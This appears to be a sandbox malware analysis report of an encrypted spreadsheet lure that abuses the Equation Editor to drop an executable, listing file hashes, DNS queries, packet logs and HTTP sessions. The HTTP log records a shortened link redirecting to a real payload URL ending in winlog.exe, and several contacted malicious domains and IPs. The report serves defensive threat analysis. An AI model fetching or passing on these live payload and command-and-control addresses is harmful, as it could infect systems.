                                                                                                                                                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                        C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):217624
                                                                                                                                                                                                        Entropy (8bit):7.895818449493941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
                                                                                                                                                                                                        MD5:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        SHA1:32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
                                                                                                                                                                                                        SHA-256:38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
                                                                                                                                                                                                        SHA-512:B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 36%

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:CDFV2 Encrypted
                                                                                                                                                                                                        Entropy (8bit):7.99670962439914
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                                        File name:QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                                                        File size:2421248
                                                                                                                                                                                                        MD5:1b862193e621b4d67be94a2ec44fbf50
                                                                                                                                                                                                        SHA1:0bab9195da974524c969404430f6a58b31303322
                                                                                                                                                                                                        SHA256:709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
                                                                                                                                                                                                        SHA512:ba8833f1b0865cfe8c86b4eaa38c2b714152483703df8be21b7ecbe889480a0498c6d875bbcb28ba24c2898b13aa439849dddbf95cb8dc5dcdca75e3e69ca540
                                                                                                                                                                                                        SSDEEP:49152:YlbvU6wGnyG31TrBVcx6+mpF14GIlyXPs5OzOy7i0llTl8Z4JeZWo:YZvpwGnyGlTrBVcxMpF1TIyPsEzON0lm

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                        Static OLE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Document Type:OLE
                                                                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                                                                        OLE File "QTN3C2AF414EDF9_041873.xlsx"

                                                                                                                                                                                                        Indicators

                                                                                                                                                                                                        Has Summary Info:False
                                                                                                                                                                                                        Application Name:unknown
                                                                                                                                                                                                        Encrypted Document:True
                                                                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                                                                        Flash Objects Count:
                                                                                                                                                                                                        Contains VBA Macros:False

                                                                                                                                                                                                        Streams

                                                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:64
                                                                                                                                                                                                        Entropy:2.73637206947
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:112
                                                                                                                                                                                                        Entropy:2.7597816111
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:200
                                                                                                                                                                                                        Entropy:3.13335930328
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:76
                                                                                                                                                                                                        Entropy:2.79079600998
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 2398680
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:EncryptedPackage
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:2398680
                                                                                                                                                                                                        Entropy:7.99993012299
                                                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:EncryptionInfo
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:224
                                                                                                                                                                                                        Entropy:4.51185762188
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . h - K . . . > % . B ] . . , . 4 . . . | . . . . . X . . . . . . . . . @ . . . $ . " * . f . . l . . . / . . k . . . . P . . . . F .

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057435989 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057462931 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057481050 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057501078 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057518959 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057542086 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057552099 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057569027 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057573080 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057593107 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057609081 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057617903 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057641029 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057642937 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057653904 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057667971 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057683945 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057691097 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057706118 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057715893 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.059798002 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.279285908 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.279328108 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.279354095 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.279382944 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.279454947 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.280575037 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284836054 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284878969 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284907103 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284934044 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284948111 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284964085 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284972906 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284977913 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.284991026 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285016060 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285018921 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285032034 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285041094 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285056114 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285068035 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285087109 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285092115 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285094976 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285116911 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285132885 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285140991 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285155058 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285167933 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285193920 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285196066 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285218000 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285237074 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285245895 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285250902 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285259008 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285264015 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285264969 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285290956 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285303116 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285317898 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285327911 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285342932 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285352945 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285367966 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285379887 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285413027 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285423040 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285446882 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285455942 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285469055 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285480022 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285494089 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285495043 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285518885 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285528898 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285546064 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285552025 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285573006 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285578012 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285600901 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285605907 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285630941 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285634041 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285660028 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285664082 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285686016 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285695076 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285713911 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285718918 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285742998 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285748005 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285768986 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285775900 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285798073 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285803080 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285825968 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285837889 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285851002 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285856009 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285882950 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.285892010 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.276086092 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.276125908 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.276130915 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.534526110 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771589041 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771761894 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771933079 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.008821964 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240080118 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240138054 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240375042 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240487099 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.478184938 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.360548019 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555277109 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555417061 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555535078 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751161098 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751426935 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751784086 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751795053 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751866102 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.947108030 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.840564966 CET4917280192.168.2.2252.57.196.177
                                                                                                                                                                                                        Feb 23, 2021 10:27:34.870275974 CET4917280192.168.2.2252.57.196.177
                                                                                                                                                                                                        Feb 23, 2021 10:27:40.876934052 CET4917280192.168.2.2252.57.196.177

                                                                                                                                                                                                        UDP Packets


                                                                                                                                                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 10:26:02.297571898 CET | 192.168.2.22 | 8.8.8.8 | 0xd44b | Standard query (0) | ow.ly | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357660055 CET | 192.168.2.22 | 8.8.8.8 | 0xd44b | Standard query (0) | ow.ly | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.863348007 CET | 192.168.2.22 | 8.8.8.8 | 0x7c8 | Standard query (0) | algreenstdykeghestqw.dns.army | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:09.647248030 CET | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.evoslancete.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:14.720684052 CET | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.fashionwatchesstore.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:20.293311119 CET | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.athara-kiano.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:26.285974979 CET | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.overseaexpert.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:31.759540081 CET | 192.168.2.22 | 8.8.8.8 | 0xf09a | Standard query (0) | www.oryanomer.com | A (IP address) | IN (0x0001)

                                                                                                                                                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.57.56 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.132.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.120.65 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.131.91 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.62.204 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.57.56 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.131.91 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.132.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.120.65 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.62.204 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.942740917 CET | 8.8.8.8 | 192.168.2.22 | 0x7c8 | No error (0) | algreenstdykeghestqw.dns.army | | 103.140.251.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:09.710748911 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Name error (3) | www.evoslancete.com | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:14.798178911 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.fashionwatchesstore.com | | 104.21.61.250 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:14.798178911 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.fashionwatchesstore.com | | 172.67.217.64 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:20.533358097 CET | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.athara-kiano.com | athara-kiano.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 10:27:20.533358097 CET | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | athara-kiano.com | | 103.251.44.218 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:26.359603882 CET | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.overseaexpert.com | overseaexpert.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 10:27:26.359603882 CET | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | overseaexpert.com | | 191.96.163.202 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:31.838535070 CET | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | www.oryanomer.com | oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 10:27:31.838535070 CET | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | | 52.57.196.177 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:31.838535070 CET | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com | | 18.195.132.44 | A (IP address) | IN (0x0001)

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • ow.ly
                                                                                                                                                                                                        • algreenstdykeghestqw.dns.army
                                                                                                                                                                                                        • www.fashionwatchesstore.com
                                                                                                                                                                                                        • www.athara-kiano.com
                                                                                                                                                                                                        • www.overseaexpert.com

                                                                                                                                                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 54.67.57.56 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:26:02.626580000 CET | 0 | OUT | GET /omCE30rxT5x HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                        Host: ow.ly
                                                                                                                                                                                                        Connection: Keep-Alive
Feb 23, 2021 10:26:02.840116024 CET | 1 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite
                                                                                                                                                                                                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: master-only
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:26:02 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        X-Pool: owly_web


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 103.140.251.164 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:26:03.166852951 CET | 2 | OUT | GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
